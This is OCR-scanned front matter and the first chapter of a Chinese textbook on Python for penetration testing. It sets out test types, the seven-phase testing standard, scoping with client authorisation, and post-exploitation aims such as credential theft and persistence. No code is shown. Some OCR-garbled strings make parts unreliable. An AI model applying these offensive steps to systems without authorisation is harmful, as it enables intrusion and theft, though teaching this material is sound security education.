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实现 信息 收集 。 第 6 章 和 第 7 章 介绍 使 用 Python 对 漏洞 进行 渗透 。 第 8 章 介绍 使 用 Python 实现 网 络 
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Preface 前 


为 什么 要 写 这 本 书 

“AEW, RIH Python。” 短 短 的 几 年 时 间 中 ，Python 在 国内 迅速 成 为 最 热门 的 编程 语 
言 之 一 。 为 什么 Python 会 取得 如 此 大 的 成 功 呢 ? 原 因 很 简单 ， 功 能 强大 、 简 单 易学 就 是 它 最 
大 的 优势 。 

而 Python 的 到 来 对 于 国内 的 网 络 安全 从 业 人 员 来 说 ， 更 是 一 个 好 消息 。 虽 然 目 前 市 面 
上 已 经 有 了 很 多 功能 强大 的 网 络 安全 工具 ,但 是 复杂 的 网 络 环境 往往 是 事先 无 法 预知 的 ， 因 
此 这 些 工具 经 常会 有 无 法 胜任 的 时 候 。 如 果 网 络 安 全 从 业 人 员 具 备 编程 能 力 ， 就 可 以 弥补 这 
些 工具 的 不 足 之 处 。 

对 于 网 络 安全 从 业 人 员 来 说 ， 最 重要 的 应 该 是 掌握 各 种 网 络 安全 的 缺陷 。 因 此 ， 目 前 的 
网 络 安全 培训 和 书籍 大 都 以 工具 的 使 用 为 主 ， 而 忽视 了 编程 能 力 的 培养 。 编 程 能 力 的 欠缺 直 
接 造 成 了 网 络 安全 从 业 人 员工 作 效 率 的 低下 。 但 是 要 网 络 安 全 从 业 人 员 花 费 大 量 的 时 间 和 精 
力 去 精通 一 门 传统 的 编程 语言 ， 实 际 上 也 并 不 现实 。 因 此 ,一 门 简单 而 又 强大 的 语言 才 是 网 
络 安全 从 业 人 员 所 需要 的 。 近 年 来 ，Python 在 编程 界 异军突起 ， 几 乎 成 为 最 热门 的 编程 语言 
无 所 不 能 ， 因 此 受到 了 广大 网 络 安 全 行业 从 业 人 员 的 喜爱 。 假 以 时 日 ，Python 语言 必 会 成 为 
最 流行 的 网 络 安全 编程 语言 。 

在 本 书 的 编写 过 程 中 ， 作 者 一 直 在 学 校 从 事 网 络 安全 方面 的 教学 。 在 实践 中 ， 作 者 发 现 
这 个 专业 的 学 生 面 对 的 最 大 困难 就 是 无 法 将 网 络 安全 中 各 种 分 散 的 知识 联系 起 来 。 这 些 年 作 
者 也 一 直 在 寻求 这 个 难题 的 解决 方法 ， 在 此 期 间 参阅 了 大 量 的 国外 优秀 图 书 。 而 最 终 作 者 发 
现 解决 这 个 问题 的 方法 就 是 掌握 一 门 编程 语言 ， 编 程 实现 所 有 的 知识 点 ， 而 这 门 编程 语言 的 
最 好 选择 正 是 Python。 本 书 在 出 版 之 前 已 经 作为 讲义 在 课堂 上 使 用 了 多 年 ， 作 者 也 根据 学 生 
的 反映 对 其 进行 了 增删 。 这 些 同学 也 成 为 本 书 最 初 的 读者 ,希望 这 本 书 在 给 他 们 带 来 知识 的 
同时 ， 也 能 为 各 位 读者 带 来 一 些 帮助 。 
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本 书 特色 


本 书 由 资深 的 网 络 安全 教师 撰写 ， 内 容 围绕 如 何 使 用 目前 最 受 瞩 目的 Python 语言 
行 网 络 安全 编程 展开 。 本 书 从 Python 的 基础 讲 起 ， 系 统 讲 述 了 网 络 安全 的 作用 、 方 法 论 ， 
Python 在 网 络 安全 管理 上 的 应 用 ， 以 及 Python 在 实现 这 些 应 用 时 相关 的 网 络 原理 和 技术 。 
结合 实例 讲解 了 使 用 Python 进行 网 络 安全 编程 的 方法 ， 以 及 在 实际 渗透 中 的 各 种 应 用 ， 包 
括 安全 工具 的 开发 、 自 动 化 报表 的 生成 、 自 定义 模块 的 开发 等 ， 将 Python 变 成 读者 手中 的 
编程 利器 。 


阅读 本 书 的 建议 


(1) 没有 了 Python 基础 的 读者 ， 建 议 从 第 1 章 开始 按 顺序 阅读 并 演练 每 一 个 实例 。 

(2) 有 一 定 Python 基础 的 读者 ， 可 以 根据 实际 情况 有 重点 地 选择 阅读 部 分 技术 要 点 。 

(3) 对 于 每 一 个 知识 点 和 项 目 案例 ， 先 通读 一 遍 以 便 有 一 个 大 概 印象 ， 然 后 将 每 个 知识 
点 的 示例 代码 都 在 开发 环境 中 操作 以 便 加 深 对 知识 点 的 理解 。 


读者 对 象 


本 书 的 读者 群 主要 是 网 络 安全 渗透 测试 人 员 、 运 维 工程 师 、 网 络 管理 人 员 、 网 络 安 全 设 
备 设计 人 员 、 网 络 安全 软件 开发 人 员 、 安 全 课程 培训 学 员 、 高 校 网 络 安全 专业 方向 的 学 生 ， 
还 包括 各 种 非 专业 但 却 热衷 于 网 络 安全 研究 的 人 员 。 

目前 ， 黑 客 文化 的 盛行 ， 以 及 网 络 安全 爱好 者 的 日 益 增 多 ， 也 为 本 书 聚 集 了 大 量 的 潜在 
读者 。 
如 何 阅读 本 书 

全 书 一 共 包 括 15 章 。 

第 1 章 主 要 介绍 了 网 络 安全 渗透 测试 的 相关 理论 。 

第 2 章 主要 介绍 了 Kali Linux 2 使 用 基础 。 

第 3 章 主 要 介绍 了 Python 语言 基础 。 

第 4 章 主 要 介绍 了 安全 渗透 测试 中 的 常见 模块 。 

第 5 章 主要 介绍 了 使 用 Python 实现 信息 收集 。 

第 6 章 主要 介绍 了 使 用 Python 对 漏洞 进行 渗透 的 基础 部 分 。 

第 7 章 主要 介绍 了 使 用 Python 对 漏洞 进行 渗透 的 高 级 部 分 。 

第 8 章 主要 介绍 了 使 用 Python 实现 网 络 的 嗅 探 与 监听 。 

第 9 章 主 要 介绍 了 使 用 Python 实现 拒绝 服务 攻击 。 

第 10 章 主要 介绍 了 使 用 Python 实现 身份 认证 攻击 。 

第 11 章 主要 介绍 了 使 用 Python 来 编写 远程 控制 工具 。 


前 言 < M 


第 12 章 主 要 介绍 了 使 用 Python 完成 无 线 网 络 渗透 基础 部 分 。 
第 13 章 主要 介绍 了 使 用 Python 完成 无 线 网 络 渗透 高 级 部 分 。 
第 14 章 主要 介绍 了 使 用 Python 对 Web 应 用 进行 渗透 测试 。 
第 15 章 主 要 介绍 了 使 用 Python 生成 渗透 测试 报告 。 


关于 勘误 


虽然 作者 花 了 很 多 时 间 和 精力 去 核对 书 中 的 文字 、 代 码 和 图 片 ， 但 因为 时 间 仓 促 和 水 平 
有 限 ， 书 中 仍 难免 会 有 一 些 不 足 和 丝 漏 ， 如 果 读 者 发 现 问题 ， 奶 请 反馈 给 作者 ， 相 关 信 息 可 
发 到 邮箱 lihuafeng1999@163.com。 作 者 会 努力 回答 疑问 或 者 指出 一 个 正确 的 方向 。 
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程序 和 网 络 设 计 者 的 目的 是 创造 ， 而 黑客 的 目标 却 是 破坏 和 窃取 。 随 着 信息 数据 越 来 越 
重要 ， 现 在 每 一 个 程序 都 好 像 一 家 拥有 大 量 现金 的 银行 一 样 ， 吸 引 着 无 数 心怀 不 轨 的 盗贼 。 
遗憾 的 是 ， 这 些 行走 在 二 进 制 世界 里 的 盗贼 们 恰恰 是 现实 世界 中 比较 聪明 的 人 。 

有 什么 办 法 能 阻止 这 些 本 来 只 应 该 生活 在 传说 中 的 人 呢 ? 这 其 实 是 一 个 困扰 了 人 们 很 多 
年 的 问题 。 不 过 现在 这 个 问题 有 了 答案 ,“ 最 了 解 你 的 人 其 实 正 是 你 的 敌人 ”。 了 既然 迟早 要 面 
对 黑客 的 入 侵 ， 那 么 为 何不 在 他 们 下 手 前 找 出 自身 的 弱点 呢 ? 显然 设计 者 本 身 很 难 胜 任 这 样 
的 工作 。 那 么 经 验 丰富 的 黑客 呢 ? 由 他 们 来 负责 检验 系统 的 安全 性 是 不 是 会 更 合适 一 些 ? 答 
案 是 肯定 的 。 不 过 此 时 这 些 进行 检验 的 人 充当 的 角色 不 再 是 黑客 ,而 是 网 络 安 全 渗透 测试 专 
家 ， 他 们 所 从 事 的 工作 也 不 再 是 破坏 和 窃取 ， 而 是 保障 系统 安全 。 

如 果 你 是 第 一 次 接触 网 络 安全 渗透 测试 这 个 问题 ， 可 能 会 对 此 充满 好 奇 和 期 待 。 那 么 在 
这 一 章 中 将 从 以 下 三 个 主题 来 展开 对 网 络 安全 渗透 测试 的 学 习 。 

(1) 什么 是 网 络 安全 渗透 测试 ? 

(2 ) 如 何 开展 网 络 安全 渗透 测试 ? 

(3 ) 进行 网 络 安全 渗透 测试 都 需要 掌握 哪些 技能 ? 


1.1 网 络 安 全 渗透 测试 简介 
在 学 习 这 个 主题 之 前 ， 先 来 了 解 一 下 网 络 安全 渗透 测试 是 什么 。 长 期 以 来 ， 在 人 们 的 心 
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目 中 常常 会 有 如 下 一 些 错误 的 观点 。 

(1) 网 络 安全 渗透 测试 就 是 漏洞 扫描 ， 所 以 只 需要 用 工具 对 目标 进行 扫描 操作 就 可 以 
To 一 款 功 能 强大 的 扫描 工具 的 确 可 以 比 人 工 更 快 地 检测 出 一 个 系统 的 漏洞 问题 ， 因 此 渗透 
测试 者 也 都 会 使 用 一 些 工 具 。 但 是 漏洞 扫描 仅仅 是 网 络 安全 渗透 测试 的 一 个 步骤 ， 除 此 之 
外 ， 例 如 目标 系统 设备 的 部 署 问题 、 使 用 者 的 安全 意识 等 都 无 法 通过 扫描 工具 获得 。 而 且 单 
单 使 用 工具 进行 扫描 也 无 法 展示 出 一 个 漏洞 可 能 产生 的 后 果 。 

(2) 网 络 安全 渗透 测试 就 是 破解 。 破 解 还 有 一 个 专业 的 名 称 ， 那 就 是 逆向 工程 。 同 样 ， 
破解 也 是 网 络 安全 渗透 测试 的 一 个 部 分 ， 破 解 的 目的 就 是 发 掘 系统 的 漏洞 ， 许 多 优秀 黑客 都 
是 以 发 据 了 重大 的 漏洞 而 著名 。 但 这 一 点 和 前 面 的 漏洞 扫描 一 样 ， 只 能 作为 全 部 渗透 测试 的 
一 个 环节 。 

(3) 网 络 安全 渗透 测试 就 是 黑客 和 人 侵 。 这 是 一 个 十 分 普遍 的 错误 观点 ， 黑 客人 侵 是 为 了 
实现 某 种 目的 ， 例 如 窃取 信息 或 者 破坏 系统 ， 因 此 只 需要 找到 能 实现 该 目的 的 一 种 方法 ， 而 
渗透 测试 则 需要 找 出 黑客 实现 目的 的 所 有 途径 ， 并 且 给 出 可 能 产生 的 效果 和 修复 的 方案 。 

可 是 网 络 安全 渗透 测试 是 什么 呢 ? 

实际 上 ， 网 络 安全 渗透 测试 严格 的 定义 应 该 是 一 种 针对 目标 网 络 进行 安全 检测 的 评估 。 
通常 这 种 测试 由 专业 的 网 络 安全 渗透 测试 专家 完成 ， 目 的 是 发 现 目标 网 络 存在 的 漏洞 以 及 安 
全 机 制 方面 的 隐患 并 提出 改善 方法 。 从 事 渗透 测试 的 专业 人 员 会 采用 和 黑客 相同 的 方式 对 目 
标 进行 人 侵 ， 这 样 就 可 以 检测 网 络 现 有 的 安全 机 制 是 否 足以 抵挡 恶意 的 攻击 。 

根据 事先 对 目标 信息 的 了 解 程度 ， 网 络 安全 渗透 测试 的 方法 有 黑 盒 测 试 、 白 盒 测试 和 灰 
盒 测试 三 种 。 

黑 盒 测试 也 称 为 外 部 测试 。 在 进行 黑 盒 测 试 时 ， 事 先 假定 渗透 测试 人 员 先 期 对 目标 网 络 
的 内 部 结构 和 所 使 用 的 程序 完全 不 了 解 ， 从 网 络 外 部 对 其 网 络 安全 进行 评估 。 黑 盒 测 试 中 需 
要 耗费 大 量 的 时 间 来 完成 对 目标 信息 的 收集 。 除 此 之 外 ， 黑 盒 测试 对 渗透 测试 人 员 的 要 求 也 
是 最 高 的 。 

白 盒 测 试 也 称 为 内 部 测试 。 在 进行 白 盒 测试 时 ， 渗 透 测试 人 员 必 须 事先 清楚 地 知道 被 测 
试 环境 的 内 部 结构 和 技术 细节 。 相 比 黑 盒 测试 ， 白 盒 渗透 测试 的 目标 是 明确 定义 好 的 ， 因 此 
白 盒 测 试 无 须 进行 目标 范围 定义 、 信 息 收 集 等 操作 。 这 种 测试 的 目标 网 络 都 是 某 个 特定 业务 
对 象 ， 因 此 相 比 黑 盒 测试 ， 白 盒 测 试 能 够 给 目标 带 来 更 大 的 价值 。 

将 白 盒 测试 和 黑 盒 测 试 组 合 使 用 ， 就 是 灰 盒 测试 。 在 进行 灰 盒 测 试 时 ， 渗 透 测 试 人 员 只 
能 了 解 部 分 目标 网 络 的 信息 ， 但 不 会 掌握 网 络 内 部 工作 原理 和 限制 信息 。 

网 络 安全 渗透 测试 的 目标 包括 一 切 和 网 络 相关 的 基础 设施 ， 其 中 包括 : 

(1) 网 络 设备 ， 主 要 包含 连接 到 网 络 的 各 种 物理 实体 ， 如 路 由 器 、 交 换 机 、 防 火 墙 、 无 
线 接 人 和 人 点、 服务器、 个 人 计算 机 等 。 
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(2) 操作 系统 ， 是 指 管理 和 控制 计算 机 硬件 与 软件 资源 的 计算 机 程序 。 例 如 ， 个 人 计 
算 机 经 常 使 用 的 Windows 7. Windows 10 等 ， 服 务 器 上 经 常 使 用 的 Windows 2012 和 各 种 
Linux。 

(3 ) 物理 安全 ， 主 要 是 指 机 房 环 境 、 通 信 线 路 等 。 

(4) 应 用 程序 ， 主 要 是 为 针对 某 种 应 用 目的 所 使 用 的 程序 。 

(5) 管理 制度 ， 这 部 分 其 实 是 全 部 目标 中 最 为 重要 的 ， 指 的 是 为 保证 网 络 安全 对 使 用 者 
提出 的 要 求 和 做 出 的 限制 。 

网 络 安全 渗透 测试 的 成 果 通 常 是 一 份 报告 。 这 个 报告 中 应 当 给 出 目标 网 络 中 存在 的 威 
胁 ， 以 及 威胁 的 影响 程度 ， 并 给 出 对 这 些 威胁 的 改进 建议 和 修复 方案 。 

另外 需要 注意 的 一 点 是 ， 网 络 安全 渗透 测试 并 不 能 等 同 于 黑客 行为 。 相 比 黑客 行为 ， 网 
络 安全 渗透 测试 具有 以 下 几 个 特点 。 

(1) 网 络 安全 渗透 测试 是 商业 行为 ， 要 由 客户 主动 提出 ， 并 给 予 授权 许可 才 可 以 进行 。 

(2 ) 网 络 安全 渗透 测试 必须 对 目标 进行 整体 性 评估 ， 进 行 尽 可 能 全 面 的 分 析 。 

(3 ) 网 络 安全 渗透 测试 的 目的 是 改善 用 户 的 网 络 安全 机 制 。 
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作为 一 次 网 络 安 全 渗透 测试 的 执行 者 ， 首 先 要 明确 在 整个 渗透 测试 过 程 中 需要 进行 的 
工作 。 当 接收 到 客户 的 渗透 测试 任务 时 ， 往 往 对 于 所 要 进行 测试 的 目标 知之 甚 少 甚至 一 无 所 
知 。 而 在 渗透 测试 结束 的 时 候 ， 对 目标 的 了 解 程度 已 经 远 远 超 过 客户 。 在 此 期 间 ， 要 从 事 大 
量 的 研究 工作 ， 根 据 pentest-standard.org 给 出 的 渗透 测试 执行 标准 ， 整 个 渗透 测试 过 程 中 的 
工作 可 以 分 成 如 下 7 个 阶段 。 

(1) 前 期 与 客户 的 交流 阶段 。 

(2 ) 情报 的 收集 阶段 。 

(3 ) 威胁 建 模 阶 段 。 

(4) 漏洞 分 析 阶 段 。 

(5 ) 漏洞 利用 阶段 。 

(6 ) 后 渗透 攻击 阶段 。 

(7) 报告 阶段 。 

接 下 来 分 别 介绍 这 7 个 阶段 中 所 需要 完成 的 工作 。 


1.2.1 前 期 与 客户 的 交流 阶段 
在 这 个 阶段 中 ,渗透 测试 者 需要 得 到 客户 的 配合 来 确定 整个 渗透 测试 的 范围 。 也 就 是 说 ， 
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要 确定 对 目标 的 哪些 设备 和 哪些 问题 进行 测试 。 而 这 些 内 容 是 在 与 客户 进行 了 商讨 之 后 得 出 
的 。 在 整个 商讨 的 过 程 中 ， 重 点 要 考虑 的 因素 主要 如 下 。 

1 渗透 测试 的 目标 

通常 这 个 目标 会 是 一 个 包含 很 多 主机 的 网 络 。 这 时 需要 确定 的 是 渗透 测试 所 涉及 的 了 P 
地 址 范围 和 域名 范围 。 但 是 客户 所 使 用 的 Web 应 用 程序 和 无 线 网 络 ， 甚 至 安保 设备 和 管理 制 
度 ， 也 可 能 会 是 渗透 测试 的 目标 。 同 样 需要 明确 的 还 有 ， 客 户 需要 的 是 全 面 评估 还 是 只 针对 
其 中 某 一 方面 或 部 分 评估 。 

2. 进行 渗透 测试 过 程 所 使 用 的 方法 

这 个 阶段 可 以 采用 的 方法 主要 有 黑 盒 测 试 、 白 盒 测 试 和 灰 盒 测试 三 种 。 

3. 进行 渗透 测试 所 需要 的 条 件 

如 果 采 用 的 是 白 盒 测 试 ， 就 需要 客户 提供 测试 所 必需 的 信息 和 权限 ， 客 户 最 好 可 以 接受 
问卷 调查 。 确 定 可 以 进行 渗透 的 时 间 ， 例 如 ， 只 能 在 周末 进行 还 是 随时 都 可 以 进行 。 如 果 在 
渗透 测试 过 程 中 导致 目标 受到 了 破坏 ， 应 该 如 何 补救 等 。 

4. 渗透 测试 过 程 中 的 限制 条 件 

在 整个 渗透 测试 过 程 中 ， 必 须 与 客户 明确 哪些 设备 不 能 进行 渗透 测试 ， 以 及 哪些 技术 不 
能 应 用 。 另 外 ， 也 需要 明确 在 哪些 时 间 点 不 能 进行 渗透 测试 。 

5. 渗透 测试 过 程 的 工期 

根据 客户 的 需求 ， 给 出 整个 渗透 测试 的 进度 表 。 客 户 可 以 了 解 渗透 测试 的 开始 时 间 与 结 
束 时 间 ， 以 及 在 每 个 时 间 段 所 进行 的 工作 。 

6 渗透 测试 的 费用 

这 个 话题 其 实 很 少 出 现在 一 本 教科 书 中 ,但 是 这 在 实践 中 恰恰 是 一 个 很 复杂 的 问题 ， 需 
要 考虑 的 因素 很 多 。 例 如 ， 在 对 一 个 拥有 100 台 计 算 机 的 网 络 进行 渗透 测试 的 时 候 ， 收 取 的 
费用 为 10 万 元 ,那么 平均 每 一 台 计 算 机 的 费用 就 是 1000 元 。 但 这 并 不 是 一 种 线性 的 关系 ， 
如 果 某 个 客户 只 要 求 对 1 台 计 算 机 进行 渗透 测试 ,那么 费用 就 不 能 只 是 1000 元 ， 因 为 工作 
量 明显 不 同 。 在 计算 费用 的 时 候 要 充分 考虑 到 各 种 成 本 。 

7. 渗透 测试 过 程 的 预期 目标 

作为 渗透 测试 者 必须 牢记 的 一 点 是 ， 我 们 并 非 黑 客 。 发 现 目标 存在 的 漏洞 、 获 取 目 标的 
控制 权限 或 者 得 到 目标 的 管理 密码 只 完成 了 一 部 分 任务 ， 还 需要 明确 客户 期 望 在 渗透 测试 结 
束 时 应 该 达到 什么 目标 ， 最 终 的 渗透 报告 应 该 包含 哪些 内 容 。 
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1.2.2 ”情报 的 收集 阶段 

这 里 的 “情报 ” 指 的 是 目标 网 络 、 服 务 器 、 应 用 程序 的 所 有 信息 。 渗 透 测试 人 员 需 要 使 
用 各 种 资源 尽 可 能 地 获取 要 测试 目标 的 相关 信息 。 

如 果 现 在 采用 黑 盒 测 试 的 方式 ， 那 么 这 个 阶段 可 以 说 是 整个 渗透 测试 过 程 中 最 为 重要 的 
一 个 阶段 。 所 谓 “知己 知 彼 ， 百 战 不 殉 ” 也 正 说 明了 情报 收集 的 重要 性 。 这 个 阶段 所 使 用 的 
技术 也 可 以 分 成 以 下 两 种 。 


1. 被 动 扫描 

这 种 扫描 方式 通常 不 会 被 对 方 所 发 现 ， 打 一 个 比方 ， 如 果 和 希望 了 解 某 一 个 人 的 信息 , 那 
么 可 以 向 他 身边 的 人 询问 ， 如 他 的 邻居 、 他 的 同事 甚至 他 所 在 社区 的 工作 人 员 。 那 么 收集 到 
信息 又 有 什么 呢 ? 可 能 是 他 的 名 字 、 年 龄 、 职 业 、 和 籍贯、 兴趣、 学历 等 。 

同样 对 于 一 个 目标 网 络 来 说 ， 也 可 以 获得 很 多 信息 ， 例 如 ， 现 在 仅仅 知道 客户 的 一 个 域 
名 一 一 www.testfire.net (这 是 美国 IBM 公司 提供 的 一 个 专门 用 来 进行 渗透 测试 训练 的 目标 ， 
所 以 对 该 目标 进行 扫描 无 须 担 心 法 律 问题 )， 通 过 这 个 域名 就 可 以 使 用 Whois 查询 到 这 个 域 
名 所 有 者 的 联系 方式 (包括 电话 号 码 、 电 子 邮 箱 、 传 真 、 公 司 所 在 地 等 信息 )， 以 及 域名 的 注 
册 和 到 期 时 间 ， 通 过 搜索 引擎 还 可 以 查找 与 该 域名 相关 的 电子 邮箱 地 址 、 博 客 、 文 件 等 。 


2. 主动 扫描 

这 种 扫描 方式 的 技术 性 比较 强 ， 通 常会 使 用 专业 的 扫描 工具 来 对 目标 进行 扫描 。 扫 描 之 
后 将 会 获得 的 信息 包括 目标 网 络 的 结构 、 目 标 网 络 所 使 用 设备 的 类 型 、 目 标 主机 上 运行 的 操 
作 系 统 、 目 标 主机 上 所 开放 的 端口 、 目 标 主机 上 所 提供 的 服务 、 目 标 主机 上 所 运行 的 应 用 程 
序 等 。 


1.2.3 威胁 建 模 阶段 


如 果 将 开展 一 次 渗透 测试 看 作 指 挥 一 场 战 争 ， 那 么 威胁 建 模 阶段 就 像 是 在 制定 战争 的 策 
略 。 在 这 个 阶段 有 两 个 关键 性 的 要 素 一 一 资产 和 攻击 者 (攻击 群体 )。 对 客户 的 资产 进行 评 
估 ， 可 找 出 其 中 重要 的 资产 。 例 如 ， 客 户 是 一 家 商业 机 构 ， 那么 这 家 机 构 的 客户 信息 就 是 重 
要 资产 。 

在 这 个 阶段 主要 考虑 如 下 问题 。 

(1 ) 哪些 资产 是 目标 中 的 重要 资产 ? 

(2 ) 攻击 时 采用 什么 技术 和 手段 ? 

(3 ) 哪些 群体 可 能 会 对 目标 系统 造成 破坏 ? 

(4) 这 些 群 体会 使 用 哪些 方法 进行 破坏 ? 

分 析 以 上 不 同 群 体 发 起 攻击 的 可 能 性 ， 可 以 更 好 地 帮助 确定 渗透 测试 时 所 使 用 的 技术 和 
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工具 。 通 常 这 些 攻击 群体 可 能 是 : 
(1) 有 组 织 的 犯罪 机 构 。 
(2) 黑客 。 
(3 ) 脚本 小 子 。 
(4) 内 部 员工 。 


1.2.4 ”漏洞 分 析 阶 段 

这 个 阶段 是 从 目标 中 发 现 漏洞 的 过 程 。 漏 洞 可 能 位 于 目标 的 任何 一 个 位 置 。 从 服务 器 到 
交换 机 ， 从 所 使 用 的 操作 系统 到 Web 应 用 程序 ， 都 是 要 检查 的 对 象 。 在 这 个 阶段 会 根据 之 前 
情报 收集 时 发 现 的 目标 的 操作 系统 、 开 放 端 口 和 服务 程序 ， 查 找 和 分 析 目 标 系统 中 存在 的 漏 
洞 。 这 个 阶段 如 果 单纯 依靠 手动 分 析 来 完成 ， 是 十 分 耗 时 耗 力 的 ， 不 过 在 Kali Linux 2 系统 
中 提供 了 大 量 的 网 络 和 应 用 漏洞 评估 工具 ， 利 用 这 些 工 具 可 以 自动 化 地 完成 这 些 任务 。 另 外 
一 点 需要 提 到 的 是 ， 对 目标 的 漏洞 分 析 不 仅 限 于 软件 和 硬件 ， 还 需要 考虑 人 的 因素 ， 也 就 是 
长 时 间 地 研究 目标 人 员 的 心理 ， 从 而 对 其 实施 欺骗 以 便 达到 渗透 目标 。 


1.2.5 ”漏洞 利用 阶段 

找到 目标 上 存在 的 漏洞 之 后 ， 就 可 以 利用 漏洞 渗透 程序 对 目标 系统 进行 测试 了 。 

这 个 阶段 中 关注 的 重点 是 ， 如 何 绕 过 目标 的 安全 机 制 来 控制 目标 系统 或 访问 目标 资源 。 
如 果 在 上 一 阶段 中 顺利 完成 任务 ， 那么 这 个 阶段 就 可 以 准确 顺利 地 进行 。 这 个 阶段 的 渗透 测 
试 应 该 具有 精准 的 范围 。 漏 洞 利用 的 主要 目标 是 获取 之 前 评估 的 重要 资产 。 最 后 进行 渗透 时 
还 应 该 考虑 成 功 的 概率 和 对 目标 可 能 造成 破坏 的 最 大 影响 。 

目前 最 为 流行 的 漏洞 渗透 程序 框架 是 Metasploit。 通 常 这 个 阶段 也 是 最 为 激动 人 心 的 时 
刻 ， 因 为 渗透 测试 者 可 以 针对 目标 系统 使 用 对 应 的 入 侵 模块 获得 控制 权限 。 


1.2.6 ”后 渗透 攻击 阶段 

这 个 阶段 和 上 一 个 阶段 连接 十 分 紧密 ， 作 为 一 个 渗透 测试 者 ， 必 须 尽 可 能 地 将 目标 被 渗 
透 后 所 可 能 产生 的 后 果 模 拟 出 来 。 在 这 个 阶段 可 能 要 完成 的 任务 包括 : 

(1 ) 控制 权限 的 提升 。 

(2) 登录 凭证 的 窃取 。 

(3 ) 重要 信息 的 获取 。 

(4) 利用 目标 作为 跳板 。 

(5) 建立 长 期 的 控制 通道 。 

这 个 阶段 的 主要 目的 是 向 客户 展示 当前 网 络 存 在 的 问题 会 带 来 的 风险 。 
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1.2.7 ”报告 阶段 

这 个 阶段 是 整个 渗透 测试 阶段 的 最 后 一 个 阶段 ， 同 时 也 是 最 能 体现 工作 成 果 的 一 个 阶 
段 ， 要 将 之 前 的 所 有 发 现 以 书面 的 形式 提交 给 客户 。 实 际 上 ， 这 个 报告 也 是 客户 唯一 的 需 
求 。 必 须 以 简单 、 直 接 且 尽 量 避 免 大 量 专业 术语 的 形式 向 客户 汇报 测试 目标 中 存在 的 问题 ， 
以 及 可 能 产生 的 风险 。 这 份 报告 中 应 该 指出 : 目标 系统 最 重要 的 威胁 ,使 用 渗透 数据 生成 的 
表格 和 图 标 ， 对 目标 系统 存在 问题 的 修复 方案 ， 以 及 对 当前 安全 机 制 的 改进 建议 等 。 
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在 《 诸 神 之 眼 一 一 Nmap 网 络 安全 审计 技术 提 秘 》 出 版 之 后 ， 作 者 收 到 了 很 多 读者 的 邮 
件 ， 其 中 大 部 分 都 问 到 了 这 个 问题 : 如 何 才能 成 为 一 个 合格 的 网 络 安全 渗透 测试 者 ? 在 作者 
看 来 ， 如 下 几 点 是 必 不 可 少 的 。 

(1) 网 络 方面 的 知识 。 这 方面 的 知识 其 实 十 分 庞大 ， 其 中 包括 计算 机 体系 结构 ， 局 域 网 
技术 ,广域网 技术 ,各 种 常见 网 络 设备 ，TCP/IP 协议 族 中 的 各 种 技术 ， 应 用 层 常见 的 协议 和 
软件 等 。 

(2 ) 渗透 测试 工具 的 使 用 。 目 前 世界 上 存在 大 量 的 安全 工具 ， 黑 客 可 能 会 利用 这 些 工具 
来 实现 人 侵 。 而 安全 渗透 测试 人 员 也 可 以 利用 这 些 工 具 提前 对 目标 进行 检查 ， 从 而 提前 发 现 
目标 的 漏洞 和 缺陷 等 。 现 在 这 些 工具 的 数量 极为 众多 ， 而 且 仍 然 在 不 断 增加 。 对 于 一 个 初学 
者 来 说 ， 最 为 困难 的 两 个 问题 就 是 在 面 对 某 个 问题 时 如 何 选 择 正确 的 工具 ， 以 及 如 何 使 用 这 
种 工具 。 

这 些 问 题 如 果 放 在 以 前 的 确 是 很 难 解决 的 ， 那 时 候 作 者 一 直 有 编写 一 本 《黑客 词典 》 的 
想法 ， 按 照 最 初 的 想法 ， 就 是 按照 功能 的 不 同 将 各 种 工具 分 类 ， 然 后 分 别 介绍 该 工具 的 功能 
和 用 法 。 不 过 很 快 作者 就 发 现 这 几乎 是 一 个 不 可 能 完成 的 任务 ， 因 为 世界 上 的 各 种 工具 的 数 
量 实在 是 太 多 了 ， 而且 增 加 的 速度 也 太 快 了 。 

不 过 现在 因为 Kali Linux 操作 系统 的 出 现 ， 这 个 问题 已 经 得 到 了 解决 ， 在 这 个 系统 中 集 
成 了 大 量 优 秀 的 安全 工具 ， 而 且 Kali Linux 中 也 对 这 些 工具 进行 了 分 类 ， 节 省 了 用 户 大 量 的 
精力 和 时 间 。 所 以 本 书 的 实验 都 采用 Kali Linux 操作 系统 作为 环境 。 

G) 程序 的 编写 。 既 然 已 经 有 了 那么 多 优秀 的 安全 工具 ， 为 什么 还 要 学 习 编 写 程序 呢 ? 
很 多 所 谓 的 黑客 ， 甚 至 上 了 新 闻 宣 传 的 黑客 ， 并 不 会 编程 ， 他 们 通常 使 用 别人 开发 的 程序 恶 
意 破坏 系统 ， 这 些 人 也 被 称 为 “脚本 小 子 ”。 这 可 不 是 一 个 讲义 词 ， 在 计算 机 的 世界 中 不 会 
编程 就 如 同 在 现实 世界 中 无 法 讲话 。 

程序 的 编写 也 正 是 本 书 的 内 容 ， 作 为 一 个 合格 的 安全 渗透 测试 人 员 ， 最 好 熟练 掌握 一 门 
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编程 语言 ， 并 且 了 解 各 种 常见 的 编程 语言 。 编 程 语言 并 没有 高 下 之 分 但 是 确实 有 难 易 ， 本 
书 选用 Python 2.7 作为 讲解 的 内 容 ， 主 要 是 考虑 这 门 语言 强大 的 第 三 方 库 ， 而 且 学 习 者 不 必 
花费 大 量 的 时 间 来 学 习 这 门 语言 的 语法 ， 这 一 点 对 于 初学 者 十 分 难得 ， 相 信 读 者 在 对 本 书 的 
阅读 过 程 中 会 很 快 领会 到 Python 的 魅力 所 在 。 


小 结 


本 章 对 什么 是 网 络 安全 渗透 测试 ， 以 及 如 何 开展 一 次 网 络 安全 渗透 测试 进行 了 介绍 。 掌 
握 渗 透 测试 的 标准 对 于 后 面 的 学 习 有 很 大 的 帮助 。 如 果 读 者 希望 对 本 章 讲解 的 网 络 安全 渗透 
测试 标准 有 更 深入 的 了 解 ， 可 以 访问 www.pentest-standard.org， 在 这 个 网 站 中 极为 详细 地 介 
绍 了 渗透 测试 的 7 个 阶段 。 

在 本 章 的 最 后 还 介绍 了 成 为 渗透 测试 者 所 需要 的 技能 。 在 后 面 的 章节 中 将 对 这 些 技能 进 
行 详细 案例 讲解 。 本 书 中 的 编程 实例 都 将 在 Kali Linux 2.0 中 完成 ， 所 以 在 第 2 章 中 将 会 详细 
讲解 Kali Linux 2 的 使 用 方法 。 
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在 现实 生活 中 经 常 有 人 会 问 :“ 黑 客 是 不 是 都 不 用 Windows 操作 系统 ?” 其 实 这 也 是 很 
多 人 都 想 要 了 解 的 一 个 问题 ， 这 个 问题 的 答案 并 不 是 绝对 的 。 但 是 大 多 数 从 事 网 络 安全 的 专 
